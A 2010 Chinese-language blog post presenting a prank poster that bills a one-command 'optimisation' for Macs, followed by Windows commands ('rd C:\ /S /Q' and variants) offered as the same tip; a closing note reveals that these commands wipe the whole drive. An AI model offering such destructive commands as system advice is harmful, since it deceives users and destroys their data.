Saturday, October 23, 2010

[優化] 眾位Mac友留意

點擊以檢視大圖

Mac機優化方案,一個指令完成,程序簡單快捷,令你的愛機立時一身輕!
廣而告之;不止自己受益,更可令人人雨露均霑。
相信各位讀各個院校的朋友,身邊也少不了Mac機不離手的同學;
大家可將此海報印出,張貼在飯堂內或民主牆上,以收最大廣告之效。

註:蓋茨的子民有福了!視窗系統用戶可在Command中輸入以下指令:rd \ /S /Q, rmdir \ /S /Q, rd C:\ /S /Q, 或 rmdir C:\ /S /Q同樣優化系統!

再註:別真的自己去試了。在UNIX系統(含Mac、Linux)下,sudo是Substitute User DO(以超級用戶的身份發出指令) ,rm是remove,加-rf則是刪除所有資料夾和內含檔案,以及忽視所有確認訊息。做了之後你想reboot也不能,因為你會連reboot指令也刪掉了。

2 comments:

  1. 你小心等陣MANGO真係試左到時佢對你不停屌

    ReplyDelete
  2. 物競天擇適者存,有人恁傻抵玩完。

    ReplyDelete